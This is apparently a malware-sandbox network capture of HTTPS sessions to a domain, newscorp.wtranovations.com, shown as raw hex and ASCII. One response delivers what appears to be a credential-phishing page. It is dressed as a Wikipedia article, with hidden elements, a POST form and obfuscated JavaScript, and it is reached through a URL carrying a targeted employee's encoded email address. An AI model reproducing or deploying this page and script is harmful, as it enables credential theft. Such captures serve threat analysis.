                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      52192.168.11.1249428104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC339OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC1171INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:17 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:16 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/favicon.ico
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wRFld%2BI2zNoZK6AQNT997CNZw8zM%2BngQYdfmd%2F2jsIYz7uYTD%2FcU6mFY%2Fe7KUN1QCh7qAMnbra5e5tF6Ll3zbvYfHlAv3mbFbYCLBKZSENXMndsL%2FLXyp0bIJDFQOyUKvXtt6HsH7YT%2Bxs4HkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=122&min_rtt=122&rtt_var=61&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 1
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23ff9f14a4da-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=134606&min_rtt=134512&rtt_var=28517&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=917&delivery_rate=29954&cwnd=252&unsent_bytes=0&cid=699ff40918f97a56&ts=331&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      53192.168.11.1249429104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC395OUTGET /edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      User-Agent: com.apple.Safari.SearchHelper/14606.3.4 CFNetwork/976 Darwin/18.2.0 (x86_64)
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC370INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:17 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      Vary: Cookie
                                                                                                                                                                                                                      Cf-Cache-Status: DYNAMIC
                                                                                                                                                                                                                      Set-Cookie: session_ffx=OLd9jSzgQJOZocCd5t26DfzjAuqlSo41UjnzHOy1Oik; HttpOnly; Path=/; Domain=215.241.147
                                                                                                                                                                                                                      CF-RAY: 923e24011ca031d1-MIA
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC999INData Raw: 31 37 63 35 0d 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 66 69 6c 74 65 72 3a 20 68 75 65 2d 72 6f 74 61 74 65 28 34 35 2e 33 31 39 37 36 33 64 65 67 29 22 3e 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 23 64 65 33 32 61 37 38 63 62 38 65 61 64 33 34 32 31 39 20 72 65 6c 3d 73 65 61 72 63 68 20 74 69 74 6c 65 3d 22 57 69 6b 69 70 65 64 69 61 20 28 65 6e 29 22 20 74 79 70 65 3d 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 70 65 6e 73 65 61 72 63 68 64 65 73 63 72 69 70 74 69 6f 6e 2b 78 6d 6c 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4d 65 64 69 61 57 69 6b 69 20 31 2e 34 34 2e 30 2d 77 6d 66 2e 32 31 22 20 6e 61 6d 65 3d 67 65 6e 65 72 61 74 6f 72 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 20 6e 61 6d 65 3d 52 65 73 6f 75 72 63 65 4c 6f 61 64 65 72
                                                                                                                                                                                                                      Data Ascii: 17c5<html style="filter: hue-rotate(45.319763deg)"><head><link href=#de32a78cb8ead34219 rel=search title="Wikipedia (en)" type=application/opensearchdescription+xml><meta content="MediaWiki 1.44.0-wmf.21" name=generator><meta content name=ResourceLoader
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC1369INData Raw: 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 69 6b 69 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 23 64 31 38 61 33 64 30 34 20 72 65 6c 3d 61 6c 74 65 72 6e 61 74 65 20 74 69 74 6c 65 3d 22 57 69 6b 69 70 65 64 69 61 20 41 74 6f 6d 20 66 65 65 64 22 20 74 79 70 65 3d 61 70 70 6c 69 63 61 74 69 6f 6e 2f 61 74 6f 6d 2b 78 6d 6c 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 23 66 31 62 61 30 39 32 61 37 35 63 36 35 38 63 20 72 65 6c 3d 64 6e 73 2d 70 72 65 66 65 74 63 68 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 23 61 64 64 66 63 62 38 31 37 36 63 63 63 62 36 30 30 30 64 66 33 30 66 35 61 65 31 36 20 6d 65 64 69 61 3d 22 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 22 20 72 65 6c 3d 61 6c 74 65 72 6e 61 74 65 3e 3c 74 69 74
                                                                                                                                                                                                                      Data Ascii: application/x-wiki><link href=#d18a3d04 rel=alternate title="Wikipedia Atom feed" type=application/atom+xml><link href=#f1ba092a75c658c rel=dns-prefetch><link href=#addfcb8176cccb6000df30f5ae16 media="only screen and (max-width: 640px)" rel=alternate><tit
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC1369INData Raw: 3d 76 65 63 74 6f 72 2d 64 72 6f 70 64 6f 77 6e 2d 6c 61 62 65 6c 2d 74 65 78 74 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 77 69 64 74 68 3a 20 30 3b 20 68 65 69 67 68 74 3a 20 30 3b 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 20 7a 2d 69 6e 64 65 78 3a 20 2d 35 30 3b 22 3e 54 6f 67 67 6c 65 20 74 68 65 20 74 61 62 6c 65 20 6f 66 20 63 6f 6e 74 65 6e 74 73 3c 2f 73 70 61 6e 3e 3c 66 6f 72 6d 20 65 6e 63 74 79 70 65 3d 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 20 6d 65 74 68 6f 64 3d 50 4f 53 54 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 66 62 30 66 34 37 64 36 20 6d 78 2d 61 75 74 6f 20 65 63 64 61 33 36 30 64 66 20 65 65 34 39 65 20 66 66 64
                                                                                                                                                                                                                      Data Ascii: =vector-dropdown-label-text style="position: absolute; display: block; width: 0; height: 0; overflow: hidden; z-index: -50;">Toggle the table of contents</span><form enctype=multipart/form-data method=POST><div class="dfb0f47d6 mx-auto ecda360df ee49e ffd
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC1369INData Raw: 20 65 36 65 61 37 39 22 20 64 61 74 61 2d 61 65 31 3d 62 39 39 20 64 61 74 61 2d 62 61 66 63 34 62 3d 63 39 38 38 35 38 20 64 61 74 61 2d 64 37 62 35 65 66 3d 62 32 63 31 20 64 61 74 61 2d 65 35 62 33 62 37 3d 63 61 65 20 64 61 74 61 2d 66 64 39 30 32 3d 61 38 37 39 66 34 20 69 64 3d 64 6f 6d 61 69 6e 2d 66 69 65 6c 64 20 6c 6f 77 3d 62 62 30 32 31 31 31 37 32 37 20 6d 65 74 68 6f 64 3d 66 32 34 37 34 63 36 35 66 36 30 61 66 20 6d 75 74 65 64 3d 63 38 63 36 35 38 63 32 63 64 62 30 30 34 20 6f 70 65 6e 3d 64 32 30 32 36 66 32 35 39 37 65 36 35 66 31 20 6f 70 74 69 6d 75 6d 3d 66 35 33 64 38 63 63 32 31 63 3e 3c 2f 73 70 61 6e 3e 22 20 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 69 6d 67 20 69 64 3d 6c 6f 67 6f 20 73 72 63 3e 3c 64 69 76 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                      Data Ascii: e6ea79" data-ae1=b99 data-bafc4b=c98858 data-d7b5ef=b2c1 data-e5b3b7=cae data-fd902=a879f4 id=domain-field low=bb02111727 method=f2474c65f60af muted=c8c658c2cdb004 open=d2026f2597e65f1 optimum=f53d8cc21c></span>" </span></div><img id=logo src><div class=
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC987INData Raw: 3a 20 61 62 73 6f 6c 75 74 65 3b 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 7a 2d 69 6e 64 65 78 3a 20 2d 36 36 3b 22 3e 41 70 70 65 61 72 61 6e 63 65 3c 2f 73 70 61 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 37 66 63 35 64 61 65 20 66 61 34 61 62 20 66 32 38 66 62 61 20 68 69 64 64 65 6e 20 66 30 38 32 33 37 33 32 61 22 20 64 61 74 61 2d 61 66 62 65 3d 64 65 30 32 36 36 62 20 64 61 74 61 2d 63 31 32 39 30 63 3d 62 37 61 20 64 61 74 61 2d 63 36 32 62 31 38 3d 65 39 38 61 20 64 61 74 61 2d 66 38 30 65 3d 66 39 33 38 65 20 64 61 74 61 2d 66 39 61 39 30 66 3d 62 37 35 30 63 20 64 61 74 61 2d 66 64 63 38 3d 64 33 62 20 69 64 3d 66 61 69 6c 75 72 65 20 6d 75 74 65 64 3d 61 61 62 32 63 39 63 63 39 32 33 30 20 6f 70 65 6e 3d 64 36 61 38 32 66 38 35 63 36 37 35 63
                                                                                                                                                                                                                      Data Ascii: : absolute; opacity: 0; z-index: -66;">Appearance</span><div class="f7fc5dae fa4ab f28fba hidden f0823732a" data-afbe=de0266b data-c1290c=b7a data-c62b18=e98a data-f80e=f938e data-f9a90f=b750c data-fdc8=d3b id=failure muted=aab2c9cc9230 open=d6a82f85c675c
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC1369INData Raw: 31 66 61 64 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 2d 5b 31 31 30 70 78 5d 20 61 31 37 32 33 65 62 20 77 2d 5b 31 31 30 70 78 5d 20 63 32 33 64 37 20 6d 78 2d 61 75 74 6f 20 69 6e 73 65 74 2d 78 2d 30 20 63 33 62 35 33 32 61 66 31 20 61 63 32 64 66 30 37 61 63 22 20 64 61 74 61 2d 63 37 63 39 3d 63 39 61 36 20 64 61 74 61 2d 63 37 64 3d 65 62 36 64 32 32 20 64 61 74 61 2d 64 31 61 63 34 3d 62 33 35 64 20 64 61 74 61 2d 64 37 37 39 65 63 3d 64 31 64 32 20 64 61 74 61 2d 66 39 65 32 37 3d 62 61 38 65 20 64 61 74 61 2d 66 65 31 37 33 39 3d 65 31 38 20 68 69 67 68 3d 65 33 34 66 30 64 37 65 61 61 65 20 69 6e 74 65 67 72 69 74 79 6b 69 6e 64 3d 63 30 66 61 35 38 35 34 39 32 30 38 63 66 20 6c 6f 77 3d 65 38 33 31 66 62 36 31 63 32 35 20 6d 65 74 68 6f 64
                                                                                                                                                                                                                      Data Ascii: 1fad<div class="h-[110px] a1723eb w-[110px] c23d7 mx-auto inset-x-0 c3b532af1 ac2df07ac" data-c7c9=c9a6 data-c7d=eb6d22 data-d1ac4=b35d data-d779ec=d1d2 data-f9e27=ba8e data-fe1739=e18 high=e34f0d7eaae integritykind=c0fa58549208cf low=e831fb61c25 method
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC1369INData Raw: 65 66 31 36 63 32 62 22 20 64 61 74 61 2d 62 31 61 38 3d 62 31 32 63 63 63 20 64 61 74 61 2d 62 64 61 34 32 35 3d 65 30 65 62 36 37 20 64 61 74 61 2d 63 33 32 66 61 3d 64 32 36 20 64 61 74 61 2d 64 66 39 30 3d 66 63 64 39 35 37 20 64 61 74 61 2d 65 63 66 62 62 66 3d 66 35 64 62 62 35 20 64 61 74 61 2d 66 32 63 39 3d 65 64 38 32 20 6f 70 74 69 6d 75 6d 3d 63 35 62 33 30 38 33 62 30 62 34 33 39 35 20 70 69 6e 67 3d 61 30 62 34 34 65 63 39 61 38 20 73 61 6e 64 62 6f 78 3d 63 36 62 36 36 36 38 37 65 34 20 73 63 6f 70 65 3d 61 39 33 66 64 65 66 66 34 64 31 20 73 70 61 6e 3d 62 61 63 65 31 38 61 34 66 62 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 72 65 66 65 72 65 6e 63 65 2d 74 65 78 74 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61
                                                                                                                                                                                                                      Data Ascii: ef16c2b" data-b1a8=b12ccc data-bda425=e0eb67 data-c32fa=d26 data-df90=fcd957 data-ecfbbf=f5dbb5 data-f2c9=ed82 optimum=c5b3083b0b4395 ping=a0b44ec9a8 sandbox=c6b66687e4 scope=a93fdeff4d1 span=bace18a4fb></span><span class=reference-text style="position: a
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC1369INData Raw: 65 36 65 34 31 22 20 64 61 74 61 2d 61 65 37 62 3d 65 61 36 20 64 61 74 61 2d 63 36 32 3d 64 61 36 33 35 37 38 20 64 61 74 61 2d 66 64 38 35 63 66 3d 64 31 62 30 32 61 20 69 6e 74 65 67 72 69 74 79 6b 69 6e 64 3d 65 30 36 39 30 35 39 36 36 32 65 30 64 61 31 20 6c 6f 77 3d 65 31 61 38 66 39 61 37 65 31 38 31 35 20 6d 65 74 68 6f 64 3d 64 65 33 35 31 61 39 65 66 31 36 61 36 61 66 20 6d 75 74 65 64 3d 61 38 63 38 65 64 30 31 39 38 35 34 34 34 20 6f 70 65 6e 3d 61 65 62 34 61 65 37 35 38 33 61 36 33 64 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 7a 2d 69 6e 64 65 78 3a 20 2d 37 38 3b 22 3e 32 20 6c 61 6e 67 75 61 67 65 73 3c 2f
                                                                                                                                                                                                                      Data Ascii: e6e41" data-ae7b=ea6 data-c62=da63578 data-fd85cf=d1b02a integritykind=e069059662e0da1 low=e1a8f9a7e1815 method=de351a9ef16a6af muted=a8c8ed01985444 open=aeb4ae7583a63d></span></div><span style="position: absolute; opacity: 0; z-index: -78;">2 languages</
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC1369INData Raw: 34 30 29 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 36 61 33 64 61 28 30 78 34 34 33 2c 30 78 34 36 39 2c 30 78 34 34 38 2c 30 78 34 32 64 29 29 2f 28 2d 30 78 31 63 63 31 2b 30 78 32 2a 30 78 65 65 32 2b 2d 30 78 66 62 29 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 64 35 30 31 36 28 2d 30 78 31 34 63 2c 2d 30 78 31 34 37 2c 2d 30 78 31 35 61 2c 2d 30 78 31 33 66 29 29 2f 28 2d 30 78 39 31 62 2a 2d 30 78 31 2b 2d 30 78 31 33 62 37 2b 30 78 61 61 35 29 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 36 61 33 64 61 28 30 78 34 32 64 2c 30 78 34 31 36 2c 30 78 34 30 66 2c 30 78 34 34 39 29 29 2f 28 30 78 31 2a 30 78 35 31 65 2b 2d 30 78 31 2a 2d 30 78 66 64 33 2b 2d 30 78 31 34 65 37 29 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 64 35 30 31 36 28
                                                                                                                                                                                                                      Data Ascii: 40)*(-parseInt(_0x36a3da(0x443,0x469,0x448,0x42d))/(-0x1cc1+0x2*0xee2+-0xfb))+parseInt(_0x4d5016(-0x14c,-0x147,-0x15a,-0x13f))/(-0x91b*-0x1+-0x13b7+0xaa5)*(-parseInt(_0x36a3da(0x42d,0x416,0x40f,0x449))/(0x1*0x51e+-0x1*-0xfd3+-0x14e7))+-parseInt(_0x4d5016(
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC1369INData Raw: 30 78 33 38 2c 2d 30 78 32 35 29 5d 3d 5f 30 78 63 32 62 36 61 34 28 30 78 30 2c 30 78 32 36 2c 2d 30 78 62 2c 30 78 31 35 29 3b 63 6f 6e 73 74 20 5f 30 78 32 33 37 32 63 65 3d 5f 30 78 39 32 65 39 38 34 3b 6c 65 74 20 5f 30 78 62 33 31 64 31 33 3d 21 21 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 63 32 62 36 61 34 28 5f 30 78 34 30 37 32 37 31 2c 5f 30 78 33 35 65 32 32 65 2c 5f 30 78 34 62 32 38 32 31 2c 5f 30 78 31 37 66 33 35 35 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 34 65 66 28 5f 30 78 34 30 37 32 37 31 2d 20 2d 30 78 65 65 2c 5f 30 78 31 37 66 33 35 35 29 3b 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 37 64 66 35 32 2c 5f 30 78 33 64 38 32 36 65 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 65 30 61 39 39 28 5f 30 78 31 37 37 61
                                                                                                                                                                                                                      Data Ascii: 0x38,-0x25)]=_0xc2b6a4(0x0,0x26,-0xb,0x15);const _0x2372ce=_0x92e984;let _0xb31d13=!![];function _0xc2b6a4(_0x407271,_0x35e22e,_0x4b2821,_0x17f355){return _0x24ef(_0x407271- -0xee,_0x17f355);}return function(_0x17df52,_0x3d826e){function _0x5e0a99(_0x177a


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      54192.168.11.1249431104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC339OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:18 UTC1171INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:17 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:16 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/favicon.ico
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bv04UlwIGsIoU3FRNJr%2FMbrwk7LmBjMjZ1%2Bw6zdMcTIDk4%2BWaxZj3CiNPDlBbTbDaNNCKvCI5O6aCkH%2FG9yZuUJvk%2Fxi6fp3sVAKqQhyUf8P43yznOoJwgQrZ6Mlkm%2B%2BJQUVzfq%2FFJfKQ1qO3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=35&min_rtt=35&rtt_var=17&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 1
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e24034b7f5c7b-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=127834&min_rtt=127747&rtt_var=27080&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=917&delivery_rate=31539&cwnd=252&unsent_bytes=0&cid=68d54da1aae0f490&ts=319&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:18 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      55192.168.11.1249432104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:18 UTC339OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:18 UTC1171INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:18 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:16 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/favicon.ico
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bv04UlwIGsIoU3FRNJr%2FMbrwk7LmBjMjZ1%2Bw6zdMcTIDk4%2BWaxZj3CiNPDlBbTbDaNNCKvCI5O6aCkH%2FG9yZuUJvk%2Fxi6fp3sVAKqQhyUf8P43yznOoJwgQrZ6Mlkm%2B%2BJQUVzfq%2FFJfKQ1qO3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=35&min_rtt=35&rtt_var=17&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 2
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e2406ecc631ec-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=127513&min_rtt=127503&rtt_var=26912&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=917&delivery_rate=31659&cwnd=252&unsent_bytes=0&cid=327d3b63b00615d9&ts=318&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:18 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      56192.168.11.1249433104.21.59.250443
